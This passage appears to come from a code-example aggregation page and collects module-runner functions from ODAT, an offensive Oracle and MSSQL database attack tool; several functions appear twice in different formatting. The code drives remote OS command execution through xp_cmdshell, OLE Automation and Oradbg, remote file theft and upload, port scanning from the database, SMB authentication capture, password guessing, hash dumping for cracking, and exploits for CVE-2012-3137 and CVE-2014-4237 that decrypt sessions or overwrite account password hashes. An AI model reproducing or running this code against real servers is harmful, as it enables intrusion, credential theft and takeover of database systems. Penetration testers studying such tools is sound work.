			args['print'].goodNews("Data has been written in the file {0}".format(args['write-file'][0]))
	if args["get-file"] != None:
		args['print'].title("Try to copy the remote file {0} to {1}".format(args['get-file'][0],args['get-file'][1]))
		data = oleAutomation.getFile(args['get-file'][0],args['get-file'][1])
		if data == True:
			args['print'].goodNews("The remote file {0} has been copied in {1}".format(args['get-file'][0],args['get-file'][1]))
		else:
			args['print'].badNews("Impossible to get the remote file {0}: '{1}'".format(args['get-file'][0],data))
	if args["put-file"] != None:
		args['print'].title("Try to copy the local file {0} to {1}".format(args['put-file'][0],args['put-file'][1]))
		data = oleAutomation.putFile(args['put-file'][0],args['put-file'][1])
		if data == True:
			args['print'].goodNews("The local file {0} has been copied in {1}".format(args['put-file'][0],args['put-file'][1]))
		else:
			args['print'].badNews("Impossible to put the local file {0} to {1}: '{2}'".format(args['put-file'][0],args['put-file'][1],data))
	if args["exec-sys-cmd"] != None:
		args['print'].title("Try to execute a Windows system command: '{0}'".format(args['exec-sys-cmd'][0]))
		status = oleAutomation.executeSysCmd(args['exec-sys-cmd'][0],wait=True)
		if status == True:
			args['print'].goodNews("The system command has been executed on the remote server")
		else:
			args['print'].badNews("Impossible to execute the Windows system command: {0}".format(status))
	if args["disable-ole-automation"] ==True:
		args['print'].title("Try to disable OLE Automation")
		status = oleAutomation.disableOLEAutomationProcedures()
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to disable OLE Automation: '{0}'".format(status))
		else:
			args['print'].goodNews("OLE Automation is disabled")
	oleAutomation.closeConnection()
Example #26
0
def runUtlHttpModule(args):
    '''
	Run the UTL_HTTP module
	'''
    status = True
    if checkOptionsGivenByTheUser(
            args, ["test-module", "scan-ports", "send"]) == False:
        return EXIT_MISS_ARGUMENT
    utlHttp = UtlHttp(args)
    status = utlHttp.connection(stopIfError=True)
    utlHttp.setTimeout(5)
    if args['test-module'] == True:
        args['print'].title("Test if the UTL_HTTP library can be used")
        status = utlHttp.testAll()
    #Option 1: sendRequest
    if args['send'] != None:
        args['print'].title(
            "Send the HTTP request stored in the {0} file".format(
                args['send'][2]))
        data = utlHttp.sendRequest(args['send'][0], args['send'][1],
                                   args['send'][2])
        if isinstance(data, Exception):
            args['print'].badNews(
                "Impossible to send the request: {0}".format(data))
        else:
            args['print'].goodNews(
                "Response from the server:\n{0}".format(data))
    #Option 2: scan-ports
    if args['scan-ports'] != None:
        ports = []
        if "," in args['scan-ports'][1]:
            ports = args['scan-ports'][1].split(',')
        elif '-' in args['scan-ports'][1]:
            startEnd = args['scan-ports'][1].split('-')
            for aPort in range(int(startEnd[0]), int(startEnd[1])):
                ports.append(str(aPort))
            if ports == []:
                logging.critical(
                    "The second parameter ('{0}') is not a valid: cancelation..."
                    .format(args['scan-ports'][1]))
                return -1
        elif args['scan-ports'][1].isdigit() == True:
            ports = [args['scan-ports'][1]]
        else:
            logging.critical(
                "The second parameter ('{0}') is not a valid port: cancelation..."
                .format(args['scan-ports'][1]))
            return -1
        args['print'].title("Scan ports ({0}) of {1} ".format(
            args['scan-ports'][1], args['scan-ports'][0]))
        resultats = utlHttp.scanTcpPorts(httpObject=utlHttp,
                                         ip=args['scan-ports'][0],
                                         ports=ports)
        utlHttp.printScanPortResults(resultats)
    utlHttp.close()
Example #27
0
def runHttpUriTypeModule(args):
    '''
	Run the HTTPURITYPE module
	'''
    status = True
    if checkOptionsGivenByTheUser(
            args, ["test-module", "httpUrl", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    httpUriType = HttpUriType(args)
    status = httpUriType.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the HTTPURITYPE library can be used")
        status = httpUriType.testAll()
    #Option 1: httpUrl
    if args['httpUrl'] != None:
        args['print'].title("Send a GET request from {0} to {1}".format(
            args['connectionStr'], args['httpUrl']))
        response = httpUriType.sendGetRequest(url=args['httpUrl'])
        if isinstance(response, Exception):
            args['print'].badNews("HTTP GET request failed")
        else:
            args['print'].goodNews(
                "The server response is:\n {0}".format(response))
            if args['outputFile'] != None:
                httpUriType.writeFile(args['outputFile'], str(response))
    #Option 2: scan-ports
    if args['scan-ports'] != None:
        ports = []
        if "," in args['scan-ports'][1]:
            ports = args['scan-ports'][1].split(',')
        elif '-' in args['scan-ports'][1]:
            startEnd = args['scan-ports'][1].split('-')
            for aPort in range(int(startEnd[0]), int(startEnd[1])):
                ports.append(str(aPort))
            if ports == []:
                logging.critical(
                    "The second parameter ('{0}') is not a valid: cancelation..."
                    .format(args['scan-ports'][1]))
                return -1
        else:
            if args['scan-ports'][1].isdigit() == True:
                ports = [args['scan-ports'][1]]
            else:
                logging.critical(
                    "The second parameter ('{0}') is not a valid port: cancelation..."
                    .format(args['scan-ports'][1]))
                return -1
        args['print'].title("Scan ports ({0}) of {1} ".format(
            args['scan-ports'][1], args['scan-ports'][0]))
        resultats = httpUriType.scanTcpPorts(httpObject=httpUriType,
                                             ip=args['scan-ports'][0],
                                             ports=ports)
        httpUriType.printScanPortResults(resultats)
    httpUriType.close()
Example #28
0
def runXpCmdShellModule(args):
    '''
	Run the XpCmdShell module
	'''
    noErrorWithEnableXpcmdshell = True
    if checkOptionsGivenByTheUser(args, [
            "test-module", "shell", "enable-xpcmdshell", "disable-xpcmdshell",
            "put-file"
    ],
                                  checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    xpcmdshell = Xpcmdshell(args)
    xpcmdshell.connect()
    if args["test-module"] == True: xpcmdshell.testAll()
    if args["put-file"] != None:
        args['print'].title(
            "Try to copy the local file {0} to {1} with powershell".format(
                args['put-file'][0], args['put-file'][1]))
        data = xpcmdshell.uploadFileWithPowershell(args['put-file'][0],
                                                   args['put-file'][1],
                                                   width=int(
                                                       args['put-file'][2]))
        if data == True:
            args['print'].goodNews(
                "The local file {0} has been copied in {1}".format(
                    args['put-file'][0], args['put-file'][1]))
        else:
            args['print'].badNews(
                "Impossible to put the local file {0} to {1}: '{2}'".format(
                    args['put-file'][0], args['put-file'][1], data))
    if args["enable-xpcmdshell"] == True:
        args['print'].title("Re-enable Xpcmdshell")
        noErrorWithEnableXpcmdshell = xpcmdshell.enableXpcmdshell()
        if noErrorWithEnableXpcmdshell == True:
            args['print'].goodNews("Xpcmdshell is re-enabled")
        else:
            args['print'].badNews("Xpcmdshell is NOT re-enabled")
    if args["shell"] == True:
        args['print'].title("Trying to get a shell thanks to xpcmdshell")
        status = xpcmdshell.getInteractiveShell()
        if status == True:
            args['print'].goodNews("Good Bye :)")
        else:
            args['print'].badNews("Impossible to get a shell on the database")
    if args["disable-xpcmdshell"] == True:
        if noErrorWithEnableXpcmdshell == True:
            args['print'].title("Disable Xpcmdshell")
            status = xpcmdshell.disableXpcmdshell()
            if status == True: args['print'].goodNews("Xpcmdshell is disabled")
            else:
                args['print'].badNews(
                    "Xpcmdshell is NOT disabled: {0}".format(status))
    xpcmdshell.closeConnection()
Example #29
0
def runCVE20123137Module(args):
    '''
	Run the CVE_2012_3137 module
	'''
    if checkOptionsGivenByTheUser(
            args, ["test-module", "get-all-passwords", "decrypt-sessions"],
            checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    cve = CVE_2012_3137(args,
                        accountsFile=args['user-list'],
                        timeSleep=args['timeSleep'])
    if args['test-module'] == True:
        cve.testAll()
    #Option 1: get all passwords
    if args['get-all-passwords'] != None:
        print
        if geteuid() != 0:
            args['print'].badNews(
                "Sorry, you need to run this as root because I need to sniff authentications to the database"
            )
        else:
            args['print'].title(
                "Getting remote passwords on the {0} server, port {1}".format(
                    args['server'], args['port']))
            cve.getPasswords()
            keys = cve.getKeys()
            if keys != []:
                args['print'].goodNews("Here are keys:\n\n{0}".format(
                    '\n'.join(keys)))
                filename = "sessions-{0}-{1}-{2}{3}".format(
                    args['server'], args['port'], args['sid'],
                    CHALLENGE_EXT_FILE)
                f = open(filename, "w")
                f.write('\n'.join(keys))
                f.close()
                args['print'].goodNews(
                    "Sessions strored in the {0} file.".format(filename))
            else:
                args['print'].badNews(
                    "Impossible to exploit this vulnreability")
    #Option 2: decrypt sessions
    if args['decrypt-sessions'] != None:
        args['print'].title("Decrypt sessions stored in {0} via {1}".format(
            args['decrypt-sessions'][0], args['decrypt-sessions'][1]))
        passwds = cve.decryptKeys(args['decrypt-sessions'][0],
                                  args['decrypt-sessions'][1])
        if passwds != []:
            passwordsStr = ""
            for e in passwds:
                passwordsStr += '{0}:{1}\n'.format(e[0], e[1])
            args['print'].goodNews("Accounts found:\n{0}".format(passwordsStr))
        else:
            args['print'].badNews("No password has been found")
Example #30
0
def runXpDirectoryModule(args):
	'''
	Run the XpDirectory module
	'''
	if checkOptionsGivenByTheUser(args,['list-files','list-dir','list-fixed-drives','list-available-media','file-exists','create-dir'],checkAccount=True) == False : return EXIT_MISS_ARGUMENT
	xpDirectory = XpDirectory(args)
	xpDirectory.connect()
	if args["test-module"] == True: xpDirectory.testAll()
	if args["list-files"] != None:
		args['print'].title("Try to list files stored in {0}".format(args["list-files"][0]))
		data= xpDirectory.listFilesViaXpDirtree(args["list-files"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to list files stored in {0}: {1}".format(args["list-files"][0],data))
		else:
			args['print'].goodNews("Files stored in {0}:\n{1}".format(args["list-files"][0],data))
	if args["list-dir"] != None:
		args['print'].title("Try to list directories stored in {0}".format(args["list-dir"][0]))
		data= xpDirectory.listDirectoriesViaXpSubdirs(args["list-dir"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to list files stored in {0}: {1}".format(args["list-dir"][0],data))
		else:
			args['print'].goodNews("Files stored in {0}:\n{1}".format(args["list-dir"][0],data))
	if args["list-fixed-drives"] == True:
		args['print'].title("Try to list drives with xp_subdirs")
		data= xpDirectory.listDrivesViaXpFixedDrives()
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to list drives with xp_subdirs: {1}".format(data))
		else:
			args['print'].goodNews("Drives:\n{0}".format(data))
	if args["list-available-media"] == True:
		args['print'].title("Try to list medias with xp_availablemedia")
		data= xpDirectory.listDrivesViaXpAvailableMedia()
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to list drives with xp_availablemedia: {1}".format(data))
		else:
			args['print'].goodNews("Medias:\n{0}".format(data))
	if args["file-exists"] != None:
		args['print'].title("Try to check if the file {0} exists".format(args["file-exists"][0]))
		data= xpDirectory.isFileExistViaXpFileexist(args["file-exists"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to know if the file {0} exists: {1}".format(args["file-exists"][0],data))
		else:
			args['print'].goodNews("{1}".format(args["file-exists"][0],data))
	if args["create-dir"] != None:
		args['print'].title("Try to create the folder {0}".format(args["create-dir"][0]))
		data= xpDirectory.createSubDiViaXpCreateSubdir(args["create-dir"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to create the folder {0}: {1}".format(args["create-dir"][0],data))
		else:
			args['print'].goodNews("The folder {0} has been created".format(args["create-dir"][0]))
	xpDirectory.closeConnection()
Example #31
0
def runCVE20123137Module(args):
    """
	Run the CVE_2012_3137 module
	"""
    if (
        checkOptionsGivenByTheUser(args, ["test-module", "get-all-passwords", "decrypt-sessions"], checkAccount=False)
        == False
    ):
        return EXIT_MISS_ARGUMENT
    cve = CVE_2012_3137(args, accountsFile=args["user-list"], timeSleep=args["timeSleep"])
    if args["test-module"] == True:
        cve.testAll()
        # Option 1: get all passwords
    if args["get-all-passwords"] != None:
        print
        if geteuid() != 0:
            args["print"].badNews(
                "Sorry, you need to run this as root because I need to sniff authentications to the database"
            )
        else:
            args["print"].title(
                "Getting remote passwords on the {0} server, port {1}".format(args["server"], args["port"])
            )
            cve.getPasswords()
            keys = cve.getKeys()
            if keys != []:
                args["print"].goodNews("Here are keys:\n\n{0}".format("\n".join(keys)))
                filename = "sessions-{0}-{1}-{2}{3}".format(
                    args["server"], args["port"], args["sid"], CHALLENGE_EXT_FILE
                )
                f = open(filename, "w")
                f.write("\n".join(keys))
                f.close()
                args["print"].goodNews("Sessions strored in the {0} file.".format(filename))
            else:
                args["print"].badNews("Impossible to exploit this vulnreability")
                # Option 2: decrypt sessions
    if args["decrypt-sessions"] != None:
        args["print"].title(
            "Decrypt sessions stored in {0} via {1}".format(args["decrypt-sessions"][0], args["decrypt-sessions"][1])
        )
        passwds = cve.decryptKeys(args["decrypt-sessions"][0], args["decrypt-sessions"][1])
        if passwds != []:
            passwordsStr = ""
            for e in passwds:
                passwordsStr += "{0}:{1}\n".format(e[0], e[1])
            args["print"].goodNews("Accounts found:\n{0}".format(passwordsStr))
        else:
            args["print"].badNews("No password has been found")
Example #32
0
def runPasswordGuesserModule(args):
	'''
	Run the PasswordGuesser module
	'''
	if checkOptionsGivenByTheUser(args,["search"],checkAccount=False, allowHostsFile=True) == False : return EXIT_MISS_ARGUMENT
	if args['hostlist'] != None:
		hosts = getHostsFromFile(args['hostlist'])
		args['print'].title("Searching valid accounts on these targets: {0}".format(hosts))
		for aHost in hosts:
			args['host'], args['port'] = aHost[0], aHost[1]
			args['print'].subtitle("Searching valid accounts on the {0} server, port {1}".format(args['host'], args['port']))
			runPasswordGuesserModuleOnAHost(args)
	else:
		args['print'].title("Searching valid accounts on the {0} server, port {1}".format(args['host'], args['port']))
		runPasswordGuesserModuleOnAHost(args)
Example #33
0
def runHttpUriTypeModule(args):
    """
	Run the HTTPURITYPE module
	"""
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "httpUrl", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    httpUriType = HttpUriType(args)
    status = httpUriType.connection(stopIfError=True)
    if args["test-module"] == True:
        args["print"].title("Test if the HTTPURITYPE library can be used")
        status = httpUriType.testAll()
        # Option 1: httpUrl
    if args["httpUrl"] != None:
        args["print"].title("Send a GET request from {0} to {1}".format(args["connectionStr"], args["httpUrl"]))
        response = httpUriType.sendGetRequest(url=args["httpUrl"])
        if isinstance(response, Exception):
            args["print"].badNews("HTTP GET request failed")
        else:
            args["print"].goodNews("The server response is:\n {0}".format(response))
            if args["outputFile"] != None:
                httpUriType.writeFile(args["outputFile"], str(response))
            # Option 2: scan-ports
    if args["scan-ports"] != None:
        ports = []
        if "," in args["scan-ports"][1]:
            ports = args["scan-ports"][1].split(",")
        elif "-" in args["scan-ports"][1]:
            startEnd = args["scan-ports"][1].split("-")
            for aPort in range(int(startEnd[0]), int(startEnd[1])):
                ports.append(str(aPort))
            if ports == []:
                logging.critical(
                    "The second parameter ('{0}') is not a valid: cancelation...".format(args["scan-ports"][1])
                )
                return -1
        else:
            if args["scan-ports"][1].isdigit() == True:
                ports = [args["scan-ports"][1]]
            else:
                logging.critical(
                    "The second parameter ('{0}') is not a valid port: cancelation...".format(args["scan-ports"][1])
                )
                return -1
        args["print"].title("Scan ports ({0}) of {1} ".format(args["scan-ports"][1], args["scan-ports"][0]))
        resultats = httpUriType.scanTcpPorts(httpObject=httpUriType, ip=args["scan-ports"][0], ports=ports)
        httpUriType.printScanPortResults(resultats)
    httpUriType.close()
Example #34
0
def runPasswordsModule(args):
	'''
	Run the Passwords module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","get-passwords","get-passwords-from-history", "get-passwords-not-locked"]) == False : return EXIT_MISS_ARGUMENT
	passwords = Passwords(args)
	status = passwords.connection(stopIfError=True)
	passwords.__getLockedUsernames__()
	if args.has_key('info')==False:
		info = Info(args)
		info.loadInformationRemoteDatabase()
		args['info'] = info
	if args['test-module'] == True :
		args['print'].title("Test if hashed passwords can be got")
		status = passwords.testAll()
	if args['get-passwords'] == True :
		args['print'].title("Try to get Oracle hashed passwords")
		status = passwords.__tryToGetHashedPasswords__()
		if status == True :
			args['print'].goodNews("Here are Oracle hashed passwords (some accounts can be locked):")
			passwords.printPasswords()
			args['print'].goodNews("Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):")
			passwords.printPasswordsOclHashcat()
		else : 
			args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
	if args['get-passwords-not-locked'] == True :
		args['print'].title("Try to get Oracle hashed passwords when the account is not locked")
		blacklistOfUsernames = passwords.__getLockedUsernames__()
		status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames)
		if status == True :
			args['print'].goodNews("Here are Oracle hashed passwords (all accounts are opened, not locked):")
			passwords.printPasswords()
			args['print'].goodNews("Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):")
			passwords.printPasswordsOclHashcat()
		else : 
			args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
	if args['get-passwords-from-history'] == True :
		args['print'].title("Try to get Oracle hashed passwords from history")
		status = passwords.__tryToGetHashedPasswordsfromHistory__()
		if status == True :
			args['print'].goodNews("Here are Oracle hashed passwords:")
			passwords.printPasswords()
		else : 
			args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
Example #35
0
def runMssqlInfoModule(args):
	'''
	'''
	if checkOptionsGivenByTheUser(args,["get-max-info"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT
	if args['get-max-info'] == True:
		mssqlInfo = MssqlInfo(args)
		productName = mssqlInfo.__getRemoteVersionThroughTDSResponse__()
		args['print'].title("Try to get the remote database version thanks to the TDS protocol:")
		if productName.has_key('Version') == True and productName.has_key('ProductName') == True:
			args['print'].goodNews("The SQL server version of {0}:{1}: {2} i.e. {3}".format(args['host'],args['port'], productName['Version'],productName['ProductName']))
		else :
			args['print'].badNews("Impossible to get the remote database version thanks to the TDS protocol")
		args['print'].title("Try to get information about the remote database thanks to SQL browser Server:")
		info = mssqlInfo.__getRemoteVersionThroughSQLServerBrowser__()
		if info == {}:
			args['print'].badNews("SQL Server Browser is not enabled on the server {0}:{1}".format(args['host'], args['port']))
		else :
			args['print'].goodNews("SQL Server Browser is enabled on the server {0}:{1}:\n{2}".format(args['host'], args['port'], mssqlInfo.returnPrintableStringFromDict(info)))
Example #36
0
def runTnsCmdModule(args):
	'''
	run the TNS cmd module
	'''
	if checkOptionsGivenByTheUser(args,["version","status","ping"],checkSID=False,checkAccount=False) == False : return EXIT_MISS_ARGUMENT
	tnscmd = Tnscmd(args)
	if args['ping'] == True:
		args['print'].title("Searching ALIAS on the {0} server, port {1}".format(args['server'],args['port']))
		alias = tnscmd.getAlias()
		args['print'].goodNews("{0} ALIAS received: {1}. You should use this alias (more or less) as Oracle SID.".format(len(alias),alias))
	if args['version'] == True:
		args['print'].title("Searching the version of the Oracle database server ({0}) listening on the port {1}".format(args['server'],args['port']))
		version = tnscmd.getVersion()
		args['print'].goodNews("The remote database version is: '{0}'".format(version))
	if args['status'] == True:
		args['print'].title("Searching the server status of the Oracle database server ({0}) listening on the port {1}".format(args['server'],args['port']))
		tnscmd.getInformation(cmd='status')
		args['print'].goodNews("Data received by the database server: '{0}'".format(tnscmd.getRecvData()))
Example #37
0
File: SMB.py Project: zyayaa/odat
def runSMBModule(args):
	'''
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module",'captureSMBAuthentication']) == False : return EXIT_MISS_ARGUMENT
	smb = SMB(args)
	status = smb.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if SMB authentication capture can be possible")
		status = smb.testAll()
	#Option 1: capture SMB authentication
	if args['captureSMBAuthentication'] !=None :
		args['print'].title("Try to capture the SMB authentication (Connection to \\\\{0}\\{1} )".format(args['captureSMBAuthentication'][0],args['captureSMBAuthentication'][1]))
		status = smb.captureSMBAuthentication(args['captureSMBAuthentication'][0],args['captureSMBAuthentication'][1])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to capture the SMB authentication")
		else : 
			args['print'].goodNews("Check your SMB capture tool ...")
Example #38
0
def runUtlTcpModule(args):
    '''
	Run the UTL_TCP module
	'''
    status = True
    if checkOptionsGivenByTheUser(
            args, ["test-module", "send-packet", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    utlTcp = UtlTcp(args)
    status = utlTcp.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the UTL_TCP library can be used")
        status = utlTcp.testAll()
    #Option 2: send packet
    if args['send-packet'] != None:
        args['print'].title("Send the packet stored in the {0} file".format(
            args['send-packet'][2]))
        data = utlTcp.sendPacket(args['send-packet'][0],
                                 args['send-packet'][1],
                                 filename=args['send-packet'][2])
        if isinstance(data, Exception):
            args['print'].badNews(
                "Impossible to send the packet: {0}".format(data))
        else:
            args['print'].goodNews(
                "Response from the server:\n{0}".format(data))
    #Option 1: tcp Scan
    if args['scan-ports'] != None:
        ports = []
        if "," in args['scan-ports'][1]:
            ports = args['scan-ports'][1].split(',')
        elif '-' in args['scan-ports'][1]:
            startEnd = args['scan-ports'][1].split('-')
            for aPort in range(int(startEnd[0]), int(startEnd[1])):
                ports.append(str(aPort))
        else:
            logging.error("Syntax for ports given not recognized")
        args['print'].title("Scan ports ({0}) of {1} ".format(
            args['scan-ports'][1], args['scan-ports'][0]))
        resultats = utlTcp.scanTcpPorts(httpObject=utlTcp,
                                        ip=args['scan-ports'][0],
                                        ports=ports)
        utlTcp.printScanPortResults(resultats)
    utlTcp.close()
Example #39
0
File: Oradbg.py Project: 6zq/odat
def runOradbgModule(args):
	'''
	Run the Oradbg module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","exec"]) == False : return EXIT_MISS_ARGUMENT
	oradbg = Oradbg(args)
	status = oradbg.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the Oradbg can be used")
		status = oradbg.testAll()
	#Option 1: exec
	if args['exec'] != None:
		args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server']))
		status = oradbg.execOSCommand(args['exec'])
		if status == True:
			args['print'].goodNews("The `{0}` command was executed on the {1} server (probably)".format(args['exec'],args['server']))
		else :
			args['print'].badNews("The `{0}` command was not executed on the {1} server: {2}".format(args['exec'],args['server'],str(status)))
	oradbg.close()
Example #40
0
def runCVEXXXYYYModule(args):
    '''
	Run the CVE_XXXX_YYYY module
	'''
    if checkOptionsGivenByTheUser(args, ["test-module", "set-pwd-2014-4237"],
                                  checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    cve = CVE_XXXX_YYYY(args)
    status = cve.connection(stopIfError=True)
    if args['test-module'] == True:
        cve.testAll()
    if args['set-pwd-2014-4237'] != None:
        hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1])
        hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1],
                                   user=args['set-pwd-2014-4237'][0])
        logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(
            hash11g, hash10g, args['set-pwd-2014-4237'][0]))
        REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(
            args['set-pwd-2014-4237'][0], hash10g, hash11g)
        REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(
            args['set-pwd-2014-4237'][0], hash10g, hash11g)
        args['print'].title(
            "Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237"
            .format(args['set-pwd-2014-4237'][0], hash10g, hash11g))
        status = cve.exploit_CVE_2014_4237(
            updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237,
            updateRequestWithView=
            REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
        if status == True:
            cve.args['print'].goodNews(
                "The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!"
                .format(args['set-pwd-2014-4237'][0],
                        args['set-pwd-2014-4237'][1]))
        elif status == False:
            cve.args['print'].badNews(
                "The password of '{0}' has NOT been replaced".format(
                    args['set-pwd-2014-4237'][0]))
        elif status == None:
            cve.args['print'].goodNews(
                "The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!"
                .format(args['set-pwd-2014-4237'][0]))
Example #41
0
def runDbmsLob (args):
	'''
	Run the DbmsLob module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","getFile"]) == False : return EXIT_MISS_ARGUMENT
	dbmsLob = DbmsLob(args)
	status = dbmsLob.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the DbmsLob module can be used")
		status = dbmsLob.testAll()
	#Option 1: getFile
	if args['getFile'] != None:
		args['print'].title("Read the {0} file stored in the {1} path".format(args['getFile'][1],args['getFile'][0]))
		data = dbmsLob.getFile (remotePath=args['getFile'][0], remoteNameFile=args['getFile'][1], localFile=args['getFile'][2])
		if isinstance(data,Exception):
			args['print'].badNews("There is an error: {0}".format(data))
		elif data == False : args['print'].badNews("The {0} file in {1} doesn't exist".format(args['getFile'][1],args['getFile'][0]))
		elif data == '' : args['print'].badNews("The {0} file is empty".format(args['getFile']))
		else :
			args['print'].goodNews("Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}".format(args['getFile'][1],args['getFile'][0],args['getFile'][2],data))
Example #42
0
File: UtlFile.py Project: 6zq/odat
def runUtlFileModule(args):
	'''
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","getFile",'putFile','removeFile']) == False : return EXIT_MISS_ARGUMENT
	utlFile = UtlFile(args)
	status = utlFile.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the UTL_FILE library can be used")
		status = utlFile.testAll()
	#Option 1: read file
	if args['getFile'] !=None :
		args['print'].title("Read the {0} file stored in {1} on the {2} server".format(args['getFile'][1],args['getFile'][0],args['server']))
		#fileExist = utlFile.getFileExist(args['getFile'][0], args['getFile'][1])
		length = utlFile.getLength(args['getFile'][0], args['getFile'][1])
		data = utlFile.getFile(args['getFile'][0], args['getFile'][1])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to read the {0} file: {1}".format(args['getFile'],data))
		else : 
			if data == False : args['print'].badNews("The {0} file in {1} doesn't exist".format(args['getFile'][1],args['getFile'][0]))
			elif data == '' : args['print'].badNews("The {0} file is empty".format(args['getFile']))
			else :
				args['print'].goodNews("Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}".format(args['getFile'][1],args['getFile'][0],args['getFile'][2],data))
				utlFile.writeFile(args['getFile'][2],data)
	#Option 2: put file
	if args['putFile'] !=None :
		args['print'].title("Put the {0} local file in the {1} folder like {2} on the {3} server".format(args['putFile'][2],args['putFile'][0],args['putFile'][1],args['server']))
		status = utlFile.putFile(args['putFile'][0], args['putFile'][1], localFile=args['putFile'][2])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to put the {0} file: {1}".format(args['putFile'][2],status))
		else : 
			args['print'].goodNews("The {0} file was created on the {1} directory on the {2} server like the {3} file".format(args['putFile'][2], args['putFile'][0], args['server'],args['putFile'][1]))
	#Option 3: remove file
	if args['removeFile'] !=None :
		args['print'].title("Remove the {0} file stored in the {1} folder on the {2} server".format(args['removeFile'][1],args['removeFile'][0],args['server']))
		status = utlFile.deleteFile(args['removeFile'][0], args['removeFile'][1])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to remove the {0} file: {1}".format(args['removeFile'][1],status ))
		else : 
			args['print'].goodNews("The {0} file was deleted on the {1} directory on the {2} server".format(args['removeFile'][1], args['removeFile'][0], args['server']))
Example #43
0
File: UtlHttp.py Project: 6zq/odat
def runUtlHttpModule(args):
	'''
	Run the UTL_HTTP module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","scan-ports","send"]) == False : return EXIT_MISS_ARGUMENT
	utlHttp = UtlHttp(args)
	status = utlHttp.connection(stopIfError=True)
	utlHttp.setTimeout(5)
	if args['test-module'] == True :
		args['print'].title("Test if the UTL_HTTP library can be used")
		status = utlHttp.testAll()
	#Option 1: sendRequest
	if args['send'] != None:
		args['print'].title("Send the HTTP request stored in the {0} file".format(args['send'][2]))
		data = utlHttp.sendRequest(args['send'][0],args['send'][1],args['send'][2])
		if isinstance(data,Exception): 
			args['print'].badNews("Impossible to send the request: {0}".format(data))
		else : 
			args['print'].goodNews("Response from the server:\n{0}".format(data))
	#Option 2: scan-ports
	if args['scan-ports'] != None:
		ports = []
		if "," in args['scan-ports'][1]: ports=args['scan-ports'][1].split(',')
		elif '-' in args['scan-ports'][1]:
			startEnd = args['scan-ports'][1].split('-')
			for aPort in range(int(startEnd[0]),int(startEnd[1])): ports.append(str(aPort))
			if ports == []:
				logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(args['scan-ports'][1]))
				return -1
		elif  args['scan-ports'][1].isdigit() == True: 
			ports = [args['scan-ports'][1]]
		else: 
			logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(args['scan-ports'][1]))
			return -1
		args['print'].title("Scan ports ({0}) of {1} ".format(args['scan-ports'][1],args['scan-ports'][0]))
		resultats = utlHttp.scanTcpPorts(httpObject=utlHttp,ip=args['scan-ports'][0],ports=ports)
		utlHttp.printScanPortResults(resultats)
	utlHttp.close()
Example #44
0
def runCVEXXXYYYModule(args):
	'''
	Run the CVE_XXXX_YYYY module
	'''
	if checkOptionsGivenByTheUser(args,["test-module","set-pwd-2014-4237"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT
	cve = CVE_XXXX_YYYY(args)
	status = cve.connection(stopIfError=True)
	if args['test-module'] == True :
		cve.testAll()
	if args['set-pwd-2014-4237'] != None :
		hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1])
		hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1], user=args['set-pwd-2014-4237'][0])
		logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, args['set-pwd-2014-4237'][0]))
